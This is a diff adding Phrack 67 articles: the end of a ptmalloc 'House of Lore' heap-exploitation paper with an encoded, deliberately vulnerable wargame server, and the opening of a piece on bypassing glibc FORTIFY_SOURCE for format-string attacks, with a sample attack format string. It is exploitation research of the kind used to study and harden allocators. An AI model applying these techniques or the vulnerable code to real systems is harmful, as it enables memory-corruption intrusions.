+the Heap by filling the holes. Then it comes back to create holes in the
+upper controlled zone so that the memory remains as:
+
+   [ chunk | hole | chunk | hole | chunk | hole | chunk ]
+
+... and finally tries to create the buffer to overflow in one of these 
+holes, knowing that this will always be adjacent to one of its buffers 
+containing information controlled by the exploiter.
+
+We will not talk about it more here. Just say that although some of these
+methodologies may seem time consuming and fatigue making, without them
+nobody could create reliable exploits, or obtain success in most of the
+attempts.
+
+
+
+               << Programming today is a race between software
+                  engineers striving to build bigger and better
+                  idiot-proof programs, and the Universe trying
+                  to produce bigger and better idiots. So far,
+                  the Universe is winning. >>
+
+                                                  [ Rich Cook ]
+
+
+
+           .---------------.
+---[ 6 ---[   Conclusions   ]---
+           .---------------.
+
+In this article we have seen how The House of Lore hid inside of itself a
+power much greater than we imagined. We also presented a fun example 
+showing that, despite not being vulnerable to all the techniques we knew so
+far, it was still vulnerable to one that until now had only been described
+theoretically.
+
+We detail a second method of attack also based on the corruption of a 
+largebin, this attack could be an alternative in some circumstances and 
+should be as important as the main method of the smallbin  corruption.
+
+Finally we detailed a way to apply THoL in version 3 of the Ptmalloc 
+library, which many thought was not vulnerable to attacks due to the 
+imposition of numerous restrictions.
+
+Reviewing and analyzing in depth some of the security mechanisms that have
+been implanted in this library, allowed to find that further studies will 
+be needed to discover new vulnerabilities and areas of code that can be 
+manipulated for personal fun and profit.
+
+If you want a tip from mine on how to improve your hacking, here goes:
+
+Reads everything, study everything... then forget it all and do it 
+differently, do it better. Fill your cup, empty your cup and fill it again 
+with fresh water.
+
+Finally, I would like to recall that I said the following in my "Malloc
+Des-Maleficarum" paper:
+
+     "...and The House of Lore, although not very suitable for a
+      credible case, no one can say that is a complete exception..."
+
+With this new article I hope I have changed the meaning of my words, and
+shown that sometimes in hacking you make mistakes, but never stop to 
+investigate and repair your errors. Everything we do is for fun, and we 
+will do it as long as we exist on the land and cyberspace.
+
+
+
+               << All truths are easy to understand
+                  once they are discovered;
+                  the point is to discover them. >>
+
+                                [ Galileo Galilei ]
+
+
+
+           .-------------------.
+---[ 7 ---[   Acknowledgments   ]---
+           .-------------------.
+
+First, I would like to give my acknowledgments to Dreg for his insistence 
+for that I would do something with this paper and it not to fall into 
+oblivion. After a bad time ... I could not give a talk on this subject at 
+RootedCon [9], Dreg still graciously encouraged me to finish the 
+translation and publish this article in this fantastic e-zine which 
+undoubtedly left its mark etched in the hacking history. 
+
+Indeed, the last details in the translation of this article are Dreg's 
+work, and this would never have been what it is without his invaluable 
+help.
+
+For the rest, also thanks to all the people I met in dsrCON!, all very 
+friendly, outgoing and all with their particular point of madness. I am not
+going to give more names, but, to all of them, thanks.
+
+And remember...
+
+Happy Hacking!
+
+
+
+           .--------------.
+---[ 8 ---[   References   ]---
+           .--------------.
+
+[1] Malloc Maleficarum
+    http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt
+
+[2] Malloc Des-Maleficarum
+    http://www.phrack.org/issues.html?issue=66&id=10
+
+[3] PTMALLOC (v2 & v3)
+    http://www.malloc.de/en/
+
+[4] Reducing the effective entropy of gs cookies
+    http://uninformed.org/?v=7&a=2&t=sumry
+
+[5] Electric Fence - Red-Zone memory allocator
+    http://perens.com/FreeSoftware/ElectricFence/
+    electric-fence_2.1.13-0.1.tar.gz
+
+[6] Jemalloc - A Scalable Concurrent malloc(3) Implementacion for FreeBSD
+    http://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf
+
+[7] Guard Malloc (Enabling the Malloc Debugging Features)
+    http://developer.apple.com/mac/library/documentation/Darwin/Reference/
+    ManPages/man3/Guard_Malloc.3.html
+
+[8] Heap Feng Shui in JavaScript - BlackHat Europe 2007
+    http://www.blackhat.com/presentations/bh-europe-07/Sotirov/
+    Presentation/bh-eu-07-sotirov-apr19.pdf
+
+[9] Rooted CON: Congreso de Seguridad Informatica (18-20 Marzo 2010)
+    http://www.rootedcon.es/
+
+[10] dnmalloc 
+     http://www.fort-knox.org/taxonomy/term/3
+
+[11] OpenBSD malloc
+     http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/malloc.c
+
+[12] Dnmaloc - A more secure memory allocator by Yves Younan, 
+     Wouter Joosen, Frank Piessens and Hans Van den Eynden
+     http://www.orkspace.net/secdocs/Unix/Protection/Description/
+     Dnmaloc%20-%20A%20more%20secure%20memory%20allocator.pdf
+
+[13] A new malloc(3) for OpenBSD by Otto Moerbeek
+     http://www.tw.openbsd.org/papers/eurobsdcon2009/otto-malloc.pdf
+
+
+
+           .----------------.
+---[ 9 ---[   Wargame Code   ]---
+           .----------------.
+
+In this last section we attach the same program "agents.c" that we saw
+above but adapted to network environment so that it can be feasible to use 
+in a servers exploitation wargame. At the same time the code is a bit more 
+elaborate and robust.
+
+As usual, "netagents.c" forks a child process (fork) for each connection 
+made to it, and as each new process has its own heap, each attacker can 
+confront the vulnerability based on zero. The actions of one not influence
+to others.
+
+The code should be adapted according to the needs of the manager conducting
+or developing the wargame (as well as the number of allowed incoming 
+connections or debugging information you want to give to the attacker if 
+the game becomes very difficult).
+
+The attached archive includes a makefile which assumes that in the same
+directory as the source is the compiled library ptmalloc2 (libmalloc.a) to 
+be linked with netagents.c. Each should adapt "malloc.c" to print the 
+information it deems necessary, but the basics would be the changes that 
+have been made throughout this article, which allows the attacker to know
+from where they extract the chunks of memory requested.
+
+How the attacker obtains the output of these changes? For simplicity,
+"netagents.c" prevents calls to send( ) by closing the standard output 
+(stdout) and duplicating it with the recent obtained client socket 
+(dup(CustomerID)). We use the same trick as the shellcodes expected.
+
+"netagents.c" also includes a new menu option, "Show Heap State", in order 
+to see the state of the memory chunks that are being allocated or released 
+during its execution, this allows you to see if the head of any free chunk 
+has been overwritten. After some legal moves, a normal output would be 
+this:
+
+
+ +--------------------------------+                                                     
+ |    Allocated Chunk (0x8093004) | -> Agents[0]                                        
+ +--------------------------------+                                                     
+ |   SIZE      =    0x00000019    |                                                     
+ +--------------------------------+                                                     
+
+ +--------------------------------+
+ |    Allocated Chunk (0x809301c) | -> Agents[1]
+ +--------------------------------+             
+ |   SIZE      =    0x00000019    |             
+ +--------------------------------+             
+
+ +--------------------------------+
+ |    Allocated Chunk (0x8093034) | -> Agents[1]->name
+ +--------------------------------+                   
+ |   SIZE      =    0x00000029    |                   
+ +--------------------------------+                   
+
+ +--------------------------------+
+ |      Free Chunk (0x8093058)    | -> Agents[1]->lastname
+ +--------------------------------+                       
+ |   PREV_SIZE  =   0x00000000    |                       
+ +--------------------------------+                       
+ |   SIZE       =   0x00000089    |                       
+ +--------------------------------+                       
+ |   FD         =   0x08050168    |                       
+ +--------------------------------+                       
+ |   BK         =   0x08050168    |
+ +--------------------------------+
+
+ +--------------------------------+
+ |    Allocated Chunk (0x80930e4) | -> Agents[1]->desc
+ +--------------------------------+
+ |   SIZE      =    0x00000108    |
+ +--------------------------------+
+
+
+Following the example of the perl exploit presented in 2.2.2, one might 
+design an exploit in C with a child process continually receiving responses
+from the server (menus and prompts), and the father answering these 
+questions with a pause, for example one second each answer (if you know 
+what to respond to work that program ...). The difficult task is to predict
+the addresses on the stack, which in the last phase of the attack, the last
+reserved chunk should match the frame created by "edit_lastname( )" since 
+that it is where we overwrite the saved return address and where the 
+program probably will break (it is obvious that ASLR enabled suppose a new 
+complexity to overcome).
+
+What happens with failed attempts and segmentation failures? The program 
+captures SIGSEGV and informs the attacker that something bad has happened 
+and encourages him to connect again. The child process is the only that 
+becomes unstable and thus a new connection leaves everything clean for a 
+new attack.
+
+The latest aid that one could provide to the attacker is to deliver the 
+source code, so this could be adapted to study the vulnerability in local, 
+and then carry his attack to the network environment.
+
+
+Attach:
+
+begin-base64 644 thol.zip
+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
+TOPXtUxQSwUGAAAAAAkACQCdAgAA4w8AAAAA
+====
+
+--------[ EOF
diff --git a/phrack67/9.txt b/phrack67/9.txt
new file mode 100644
index 0000000..b87a3fb
--- /dev/null
+++ b/phrack67/9.txt
@@ -0,0 +1,835 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x09 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ A Eulogy for Format Strings ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ by Captain Planet ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+Index
+
+------[ 0. Introduction
+------[ 1. Glibc's FORTIFY_SOURCE
+------[ 2. Bypassing FORTIFY_SOURCE
+------[ 3. Exploitation
+          A.  Dummy program
+          B.  CUPS lppasswd bug
+          C.  TODO- ASLR
+------[ 4. Afterword
+
+
+------[ 0. Introduction
+
+Today the Windows CRT disables %n by default [0]. And likewise, glibc's
+FORTIFY_SOURCE patches provides protection mechanisms which render 
+exploitation impossible. Objective-C isn't being considered, but i'm told 
+you can have plenty of fun there too. Even format strings weren't a 
+critically endangered species, they've been demoted to the class of 
+infoleak. The great thing about format strings of course was that they 
+provided both a read and write primitive. They were the `spork` of 
+exploitation. ASLR? PIE? NX Stack/Heap? No problem, fmt had you covered.
+
+The story goes that around 2000 everybody was hunting down format strings.
+Just about everything was vulnerable. Check out the TESO article in the 
+links. It was pretty outrageous. CORE exploited pretty much everything with
+locales too [1]. But today, those days are long one. Unless of course 
+you're hacking edus, in which case you can still use locale bugs to pop 
+root shells on PMOS technology.
+
+A few months ago something funny happened. A guy by the name of Ronald
+Volgers [2] had his way with CUPS lppasswd, which was shipped root setuid 
+in Ubuntu and Debian. Nice find man! Locale bugs, oh yeah, awesome!
+
+Unfortunately, the aforementioned patch makes fmt str exploitation quite
+unlikely.
+
+In detail, the FORTIFY_SOURCE provides two countermeasures against fmt
+strings.
+
+  1)   Format strings containing the %n specifier may not be located at a
+       writeable address in the memory space of the application.
+
+  2)   When using positional parameters, all arguments within the range 
+       must be consumed. So to use %7$x, you must also use 1,2,3,4,5 and 6.
+
+But thats okay since the FORTIFY_SOURCE patch is not really all that 
+complete. (-: Why? Because glibc is really really weird code. It amazes me 
+that someone would travel all around the world and take credit for glibc 
+when they did not even write it. Actually, it makes perfect sense, nobody 
+with any dignity would admit to writing any part of glibc to public 
+audiences. Don't get me wrong, glibc lets pretty good stuff happen to my 
+computer. The code is pretty hard to look at though, you wouldn't introduce
+her to your parents if you know what I mean...
+
+What you're about to read is slightly harder than writing a format string
+and a little bit easier than building glibc itself. (Glibc binaries are 
+ideal for an ELF VX because of the difficulty of compiling them). 
+Prequisites are understanding format string exploitation. They were last 
+written about in phrack here [3] if you need a refresher. If you have never
+exploited a format string vuln, seek the article by 'rebel' [6]. It is one 
+of the most skilled and digestible discourses available.
+
+So lets dive right in.
+
+------[ 1. Glibc's FORTIFY_SOURCE
+
+===========================================================================
+WARNING: THE REST OF THIS ARTICLE INCLUDES GLIBC CODE WHICH MAY INDUCE 
+CHEST PAIN, VOMITING, BLACKOUTS, or PERMANENT LOSS OF EYESIGHT. ALL 
+ATTEMPTS TO KEEP KEEP GLIBC CODE TO A MINIMUM HAVE BEEN MADE BY THE AUTHOR.
+===========================================================================
+
+"%49150u %4849$hn %1$*269158540$x %1$*13996$x %1073741824$d"
+
+Have you seen a format string like that before? It makes positional 
+parameters look less attractive, doesn't it?
+
+So how does this patch supposedly work?
+
+To turn it on the binary must be compiled with `-D_FORTIFY_SOURCE=2` 
+enabled with an optimization level of at least -O2. This is likely because 
+of the compiler pass the patch is implemented at.
+
+So the following happens.
+
+   0x08048509 <+57>:  mov    %ebx,0x4(%esp)
+   0x0804850d <+61>:  movl   $0x1,(%esp)
+   0x08048514 <+68>:  call   0x80483c4 <__printf_chk@plt>
+
+First, calls to printf, etc get rerouted to __*_chk in your compiled binary
+and the first argument of :flag: is passed as 1.
+
+A.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+File: libc/debug/printf_chk.c
+
+/* Write formatted output to stdout from the format string FORMAT.  */
+int
+___printf_chk (int flag, const char *format, ...)
+{
+  va_list ap;
+  int done;
+
+  _IO_acquire_lock_clear_flags2 (stdout);
+  if (flag > 0)
+    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;
+
+  va_start (ap, format);
+  done = vfprintf (stdout, format, ap);
+  va_end (ap);
+
+  if (flag > 0)
+    stdout->_flags2 &= ~_IO_FLAGS2_FORTIFY;
+  _IO_release_lock (stdout);
+
+  return done;
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The function sets the _IO_FLAGS2_FORTIFY bit to ON in the FILE* structure 
+to enable the FORTIFY checks. This is sort of clever, as the bit will 
+always get toggled on when entering dangerous functions. You can not 
+universally disable the mechanism very easily. But this itself does not 
+actually guarantee any kind of security.
+
+Under libio/libio.h the following secondary flags are defined:
+
+#define _IO_FLAGS2_MMAP 1         //fopen 'm' mmap access mode
+#define _IO_FLAGS2_NOTCANCEL 2    //open/read/write should not be used as
+                                    thread cancellization points
+#ifdef _LIBC
+# define _IO_FLAGS2_FORTIFY 4     //enable fortify security checks
+#endif
+#define _IO_FLAGS2_USER_WBUF 8    //wide buffer (2-byte) support funk
+#ifdef _LIBC
+# define _IO_FLAGS2_SCANF_STD 16  // %a support for scanf
+#endif
+
+Disabling the entire flags buffer should not be too much trouble, but may
+lead to some inconsistencies if the file stream pointer is opened with 'm' 
+in the mode parameter.
+
+The astute reader will be wondering about functions such as vsnprintf, 
+which require no file stream pointer. Well, glibc provides an okay 
+solution. A file stream pointer is made on the stack with a callback that 
+writes to a buffer instead of a file descriptor. This file stream pointer 
+is then passed along to vfprintf.
+
+Now, with the _IO_FLAGS2_FORTIFY bit set, there are two protections that 
+are enabled.
+
+B. Protection #1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+File: libc/stdio-common/vfprintf.c
+
+   LABEL (form_number):
+\
+      if (s->_flags2 &
+_IO_FLAGS2_FORTIFY)                                    \
+
+{                                                                     \
+          if (!
+readonly_format)                                              \
+
+{                                                                 \
+              extern int __readonly_area (const void *,
+size_t)               \
+
+attribute_hidden;                                             \
+
+readonly_format                                                 \
+                = __readonly_area (format, ((STR_LEN (format) +
+1)            \
+                                            * sizeof
+(CHAR_T)));              \
+
+}                                                                 \
+          if (readonly_format <
+0)                                            \
+            __libc_fatal ("*** %n in writable segment detected
+***\n");       \
+
+}                                                                     \
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+If the format string payload containing a %n is located in a writeable 
+memory area such as the stack or BSS or DATA or the heap, this patch will 
+detect it and error out. Besides a DoS, this patch renders format strings 
+pretty harmless.
+
+
+C. Protection #2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+File: libc/stdio-common/vfprintf.c
+    /* Determine the number of arguments the format string consumes.  */
+    nargs = MAX (nargs, max_ref_arg);
+
+    /* Allocate memory for the argument descriptions.  */
+    args_type = alloca (nargs * sizeof (int));
+    memset (args_type, s->_flags2 & _IO_FLAGS2_FORTIFY ? '\xff' : '\0',
+            nargs * sizeof (int));
+    args_value = alloca (nargs * sizeof (union printf_arg));
+    args_size = alloca (nargs * sizeof (int));
+..
+    for (cnt = 0; cnt < nargs; ++cnt)
+..
+      switch (args_type[cnt])
+..
+        case -1:
+          /* Error case.  Not all parameters appear in N$ format
+             strings.  We have no way to determine their type.  */
+          assert (s->_flags2 & _IO_FLAGS2_FORTIFY);
+          __libc_fatal ("*** invalid %N$ use detected ***\n");
+        }
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The effect of this second patch is that all of the arg_types are set to -1
+by default. If there are any argument holes in between which do not get 
+processed, they are left as -1. So the effect is that:
+
+  %4$x
+
+would be invalid but
+
+  %4$x %2$x %1$x %3x
+
+would be okay.
+
+To be honest, I do not really see this as some huge security improvement 
+but more of a nuisance. It does not really stop infoleaks much. Maybe they
+wanted to prevent people from exploiting 8 character format strings, 
+because those are really common in the wargaming scene.
+
+
+------[ 2. Bypassing FORTIFY_SOURCE
+
+Now, if you were paying attention, you saw a bunch of allocas in 1-A. That 
+:nargs: variable, that is the calculated maximum number of arguments. If a 
+fmt str has simple arguments, the value is just that number. But, if a fmt 
+str uses width arguments or positional parameters (often called direct 
+parameters in other format string articles), then those also factor into 
+the maximum :nargs: value
+
+As an example in this string,
+%x %x %x %13981938$x,
+
+13981938 is the :nargs: value being passed to the alloca functions in code
+snippet 1-C.
+
+Do not get too excited. This is not enough for generic control. 
+Unfortunately, we can not do the same stack shifting as in [4] since we are
+in a context past the initial stack frame allocation. At the epilogue of 
+the function, a base register will be used to collapse the stack, making 
+stack shifting less useful without being accompanied by memory clobbering. 
+This is true of many of the architecture's C compilers. They pretty much 
+all implement some sort of easy stack clean-up with a base register, so 
+alloca itself is difficult to attack.
+
+Instead, it is the operations that use the allocated memory that must be
+exploited. The integer overflow can be used to trigger all sorts of memory
+trespasses.
+
+One other thing to do is shift the stack into the heap using the alloca. 
+This also turns out to be difficult because of those memset operations.
+
+But we do have a loss of state. And as always, from a loss of state new
+opportunites arise. We are in the land of undefined. Hi mom and dad!
+
+This article will use one such trespass opportunity to bypass 
+FORTIFY_SOURCE. It should be noted that others exist, but may be a bit 
+harder to utilize than this one.
+
+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+
+Arbitrary 4-byte NUL overwrite.
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+File: stdio-common/vfprintf.c
+
